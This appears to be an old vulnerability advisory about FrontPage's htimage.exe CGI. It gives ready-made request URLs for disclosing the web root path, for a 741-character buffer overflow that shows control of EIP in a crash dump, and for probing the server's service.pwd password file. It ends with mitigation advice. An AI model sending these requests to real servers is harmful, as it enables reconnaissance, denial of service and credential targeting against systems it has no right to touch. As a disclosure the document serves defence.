Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17182
HistoryJun 04, 2007 - 12:00 a.m.

CERN İmage Map Dispatcher

2007-06-0400:00:00
vulners.com
16

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I
found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer
overflow 3) Allow
us to access files.

Problem #1

Like I said, the first bug gives us the full path to the root directory. I tested this
vulnerability
against some servers, all where vulnerable!

Tested / Vulnerable FP Servers: 3.0.2.926 (FrontPage'98), 3.0.2.1706, 4.0.2.2717,
2.0.1.927, 3.0.2.926,
3.0.2.1105, 3.0.2.1330, 3.0.2.1117 (All Windows based web servers are vulnerable if we
have premission
to execute "htimage.exe" + If "htimage.exe" exist).

To test this vulnerability we need "htimage.exe" in our "cgi-bin" directory (it's
installed by default)
and premission to execute it. That's why only Windows is vulnerable, Unix based
systems can't execute
"*.exe" files.

If we access "htimage.exe" using our favorite web browser like:
http://server/cgi-bin/htimage.exe/linux?0,0
we get this error:

---------------------------------------------------------------------------------
---
Error

Error calling HTImage:

Picture config file not found, tried the following:

    q:/hidden_directory_because_of_the_script_kiddies/webroot/linux
    /linux
---------------------------------------------------------------------------------
---

Now we know that the path to the root directory is
"q:/hidden_directory_because_of_the_script_kiddies/webroot/".

Problem #2

Like I said, simple buffer overflow. Tested against "Microsoft-PWS-95/2.0" and
"FrontPage-PWS32".
Tested / Vulnerable OS: Windows'95/98
"htimage.exe" buffer overflows if we access it like:
http://server/cgi-bin/htimage.exe/<741 A's>?0,0.



HTIMAGE caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:

Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c


<Server still running> + <500 Server Error>

First remote FrontPage exploit?

Problem #3

It&#39;s not a serious bug. Using &quot;htimage.exe&quot; we can access files on server, but
we can&#39;t read them. Accessing &quot;htimage.exe&quot; like:
http://server/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
outputs:

---------------------------------------------------------------------------------
---
Error

Error calling HTImage:

HTImage.c: Syntax error at line 1 Bad field name, expecting &#39;default&#39;, &#39;rectangle&#39;,
&#39;circle&#39; or
&#39;polygon&#39; &#40;got an alphanumeric string&#41;
---------------------------------------------------------------------------------
---

NOTE: Accessing &quot;/_vti_pvt/service.pwd&quot; outputs : 403 Forbidden

Solution
~~~~~~~~
1&#41; Remove &quot;htimage.exe&quot;.
2&#41; Do not use FrontPage, simple enough :&#41;